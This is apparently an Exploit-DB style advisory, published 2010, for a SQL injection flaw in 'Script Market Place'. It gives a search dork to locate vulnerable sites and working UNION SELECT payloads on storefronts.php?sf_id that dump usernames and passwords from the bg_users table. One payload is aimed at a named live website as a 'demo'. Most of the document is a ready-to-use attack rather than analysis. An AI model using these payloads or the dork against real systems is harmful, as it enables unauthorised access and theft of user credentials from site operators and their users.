Script Market Place suffers from a remote SQL Injection vulnerability.
f8740ed55d4e6b7f347896dbd5415a0eaaa97ba74603244a06dff41706945cdb
# EDB-ID: 13400
# CVE: ()
# OSVDB-ID: ()
# Author: Mr.Benladen
# Published: 2010-06-06
# Verified: No
# Download: Exploit Code
# Download: N/A
[~]######################################### InformatioN
#############################################[~]
[~] Title : Script Market Place sql inj3ction Vulnerability
[~] Author : Mr.Benladen
[~] Homepage : http://www.joomlaservice.info Or http://www.dz4all.com
[~] Email : MaFiadu48@hotmail.fr
[~] Dork : allinurl: storefronts.php?sf_id=
[~]#########################################??? ExploiT??
#############################################[~]
[~] For Exemple :
SQL iS hERE http://127.0.0.1/storefronts.php?sf_id=sQL
http://127.0.0.1/storefronts.php?sf_id=-9999+union%20select+1,concat%28username,0x3a,password%29+from+bg_users--
demo:
http://kioskmarketplace.com/storefronts.php?sf_id=40+union%20select+1,concat%28username,0x3a,password%29+from+bg_users--
[~]######################################### ThankS To
############################################[~]
[~] Special Thanks To My Best FriendS :
Federal7 khallidmoro,dr.prorat,blackroot,Ra3ch,Zioon From ukarnia- and all
Morocan hackerz
[~] Morocan h4ckerz
[~]######################################### FinisH :D
##############################